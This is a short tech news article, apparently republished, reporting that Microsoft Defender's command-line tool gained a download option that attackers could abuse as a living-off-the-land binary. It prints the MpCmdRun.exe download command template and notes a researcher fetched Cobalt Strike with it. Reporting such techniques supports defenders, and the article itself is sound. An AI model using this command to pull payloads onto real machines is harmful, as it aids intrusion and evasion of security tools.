Windows 10 Antivirus Could Be Used To Download Malware

Windows 10 Antivirus Could Be Used To Download Malware



4 years ago

~21.0 mins read

Advertisement

A recent Microsoft Defender update means the Windows 10 antivirus software could have been used as a vessel through which to download malicious files from the web.

According to penetration tester Mohammad Askar, changes to the Microsoft Defender command line tool could allow attackers to use the software as a living-off-the-land binary (LOLBin).

Numerous LOLBins are present in Windows 10, all of which serve a legitimate function.

Advertisement

However, with the right privileges, hackers can abuse these binaries to bypass security facilities and conduct attacks without alerting the victim.

  • Here's our list of the best Windows 10 antivirus services around
  • We've built a list of the best ransomware protection software available
  • Check out our list of the best firewall out there
  • Windows 10 antivirus

    As noted by Askar, the Microsoft Defender command line tool now supports a new "-DownloadFile" function. The change is thought to have taken effect with Microsoft Defender version 4.18.2007.9 or 4.18.2009.9.

    As a result, an attacker on a local network could use the Microsoft Antimalware Service Command Line Utility to download a file from the internet with the following command: "MpCmdRun.exe -DownloadFile -url <url> -path <local-path>".

    Using this technique, Askar was able to download Cobalt Strike malware from a remote location directly via Microsoft Defender.

    While Defender will detect and mitigate any malicious files downloaded using this method, it is unclear whether other popular antivirus services will be able to defend against this avenue of attack, in instances in which native protections have been disabled.

    System administrators are advised to update their watchlists to include the new LOLBin, to ensure it is not used to mount an attack.

    TechRadar Pro has asked Askar to advise on how individual users should set about protecting themselves but is yet to receive a response.

    .

    Was my post useful? Support me to keep creating useful content

    Disclaimer If this post is your copyrighted property, please message this user or email us your request at team@pejoweb.com with a link to this post




    2 likes
     

    Advertisement

    ";

    Advertisement